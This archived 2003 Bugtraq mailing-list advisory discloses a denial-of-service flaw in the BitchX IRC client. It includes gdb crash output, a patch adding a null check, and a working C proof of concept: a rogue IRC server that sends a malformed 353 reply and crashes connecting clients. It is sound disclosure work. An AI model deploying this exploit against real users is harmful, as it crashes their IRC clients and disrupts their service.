90962 2003-02-18  05:48  /247 rader/  <argv@hushmail.com>
Importerad: 2003-02-18  05:48  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3538>
Ärende: [argv] BitchX-353 Vulnerability
------------------------------------------------------------

-----BEGIN PGP SIGNED MESSAGE-----

Mon Feb 17 15:26:06 EST 2003

1. Topic:
        BitchX IRC Client

2. Relevant versions:
        Vulnerable:
                BitchX-75p3
                BitchX-1.0c16
                BitchX-1.0c19
                BitchX-1.0c20cvs
        Not Vulnerable:
                BitchX-1.0c18

3. Problem description:
        A denial of service vulnerability exists in BitchX. Sending
        a malformed RPL_NAMREPLY numeric 353 causes BitchX to segfault.
        This problem was reported to panasync@efnet#bitchx on
        Jan 30 2003, as of this writing we are unaware of any patches
        or workarounds provided by panasync and or any members of
        #bitchx

4. Workaround:
        Patch Included
        Use epic, ircII

5. References:
        http://www.bitchx.org
        http://www.epicsol.org
        http://www.ircii.org

6. Contact:
        argv@hushmail.com


- -----begin gdb.output-----
argv@black:~/BitchX_353/BitchX/source$ gdb ./BitchX
Reading symbols from ./BitchX...done.
(gdb) r argv.matrux.net
Starting program: /home/argv/BitchX_353/BitchX/source/./BitchX argv.matrux.net
BitchX - Based on EPIC Software Labs epic ircII (1998).
Version (BitchX-1.0c20cvs) -- Date (20020325).
Process [30890]
Program received signal SIGSEGV, Segmentation fault.
0x80bcdff in funny_namreply ()
(gdb) info reg
eax            0x0      0
ecx            0xbfffcf34       -1073754316
edx            0x0      0
ebx            0xbfffcf2c       -1073754324
esp            0xbfffcc94       0xbfffcc94
ebp            0xbfffd7b5       0xbfffd7b5
esi            0xbfffd7b8       -1073752136
edi            0x0      0
eip            0x80bcdff        0x80bcdff
eflags         0x10282  66178
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x20     32
ftag           0xffff   65535
fiseg          0x23     35
fioff          0x80d1c7c        135076988
foseg          0x2b     43
fooff          0xbfffe130       -1073749712
fop            0x0      0
(gdb) disass $eip-0x20 $eip+0x20Dump of assembler code from 0x80bcddf to 0x80bce1f:
0x80bcddf <funny_namreply+19>:  sbb    $0x0,%al
0x80bcde1 <funny_namreply+21>:  add    %al,(%eax)
0x80bcde3 <funny_namreply+23>:  add    %al,0x26af8c4(%ebx)
0x80bcde9 <funny_namreply+29>:  push   %ebx
0x80bcdea <funny_namreply+30>:  mov    0x318(%eax),%eax
0x80bcdf0 <funny_namreply+36>:  call   *%eax
0x80bcdf2 <funny_namreply+38>:  mov    (%ebx),%ebp
0x80bcdf4 <funny_namreply+40>:  mov    0x4(%ebx),%esi
0x80bcdf7 <funny_namreply+43>:  mov    0x8(%ebx),%edi
0x80bcdfa <funny_namreply+46>:  mov    %edi,%edx
0x80bcdfc <funny_namreply+48>:  add    $0x10,%esp
0x80bcdff <funny_namreply+51>:  cmpb   $0x0,(%edi)
0x80bce02 <funny_namreply+54>:  je     0x80bce2f <funny_namreply+99>
0x80bce04 <funny_namreply+56>:  mov    0x1c(%esp,1),%ecx
0x80bce08 <funny_namreply+60>:  inc    %ecx
0x80bce09 <funny_namreply+61>:  cmpb   $0x20,(%edx)
0x80bce0c <funny_namreply+64>:  je     0x80bce1b <funny_namreply+79>
0x80bce0e <funny_namreply+66>:  mov    %esi,%esi
0x80bce10 <funny_namreply+68>:  inc    %edx
0x80bce11 <funny_namreply+69>:  mov    (%edx),%al
0x80bce13 <funny_namreply+71>:  test   %al,%al
0x80bce15 <funny_namreply+73>:  je     0x80bce1b <funny_namreply+79>
0x80bce17 <funny_namreply+75>:  cmp    $0x20,%al
0x80bce19 <funny_namreply+77>:  jne    0x80bce10 <funny_namreply+68>
0x80bce1b <funny_namreply+79>:  mov    %ecx,0x1c(%esp,1)
End of assembler dump.
- -----end gdb.output-----


- -----begin BitchX-1.0c20cvs-353.diff-----
diff -Nru BitchX.orig/source/funny.c BitchX/source/funny.c
- --- BitchX.orig/source/funny.c  Sun Feb 16 18:34:16 2003
+++ BitchX/source/funny.c       Sun Feb 16 18:39:56 2003
@@ -260,7 +260,10 @@
        type = Args[0];
        channel = Args[1];
        line = Args[2];
- -
+       if (channel == NULL || line == NULL) {
+               bitchsay("Invalid number of arguments for %s", __FUNCTION__);
+               return;
+       }
        ptr = line;
        while (*ptr)
        {
- -----end BitchX-1.0c20cvs-353.diff-----


- -----begin bitchx-353.c-----
/*
 * bitchx-353.c
 * --argv
 * Jan/30/03
 *
 * Vulnerable:
 *      BitchX-75p3
 *      BitchX-1.0c16
 *      BitchX-1.0c19
 *      BitchX-1.0c20cvs
 *
 * Not Vulnerable:
 *      BitchX-1.0c18   (So far..)
 *
 *
 *  Workaround:
 *      in function funny_namreply()
 *      after the PasteArgs(Args, 2);
 *      add in
 *      -- snip --
 *      if (Args[1] == NULL || Args[2] == NULL)
 *                      return;
 *      -- unsnip --
 *
 * ---- the vuln code of bx -----
 *       PasteArgs(Args, 2);
 *       type = Args[0];
 *       channel = Args[1];
 *       line = Args[2];
 *
 *       ptr = line;
 *       while (*ptr)
 *       {
 *               while (*ptr && (*ptr != ' '))
 *                       ptr++;
 *               user_count++;
 *               while (*ptr && (*ptr == ' '))
 *                       ptr++;
 *       }
 * ------------------------------
 *
 * [panasync(panasync@colossus.melnibone.org)] you would hope the irc server would be a trusted source.
 * [hellman(hellman@ipv6.gi-1.au.reroute.se)] 'Free porn at /server irc.owned.com'
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

static char shellcode[] = ":* 353 * =  :\n";    // <-- this could be something worse.

int acceptConnection(int fd)
{
   char *ip_addr;
   int descriptor, sal;
   struct sockaddr_in sa;
   sal = sizeof(sa);
   descriptor = accept(fd, (struct sockaddr *) &sa, &sal);
   if (descriptor >= 0) {
      ip_addr = inet_ntoa(sa.sin_addr);
      printf("Connection from %s:%d\n", ip_addr, ntohs(sa.sin_port));
   }
   return descriptor;
}


int main(int argc, char **argv)
{
   int sock, serv, port;
   struct sockaddr_in server;

   port = 6667;

   if (argc > 1)
        port = atoi(argv[1]);

   memset(&server, 0, sizeof(server));
   server.sin_port = htons(port);
   server.sin_family = AF_INET;
   server.sin_addr.s_addr = INADDR_ANY;

   sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
   setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &serv, sizeof(int));

   if (bind(sock, (struct sockaddr *) &server, sizeof(struct sockaddr_in))
       == -1) {
      return 0;
   }

   listen(sock, 1);

   while (1) {
      serv = acceptConnection(sock);
      write(serv, shellcode, strlen(shellcode));
      close(serv);
   }
   return 0;
}
- -----end bitchx-353.c-----

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlkEARECABkFAj5Qa5gSHGFyZ3ZAaHVzaG1haWwuY29tAAoJEO/BXrpp9Bkp5YkAoLkr
CpVMFSHmOyysTyxrDPIMhVpiAJ9KqROclL0CQCxjGxoZSQUvcHoKMg==
=EuNh
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427
(90962) / <argv@hushmail.com>/----------------------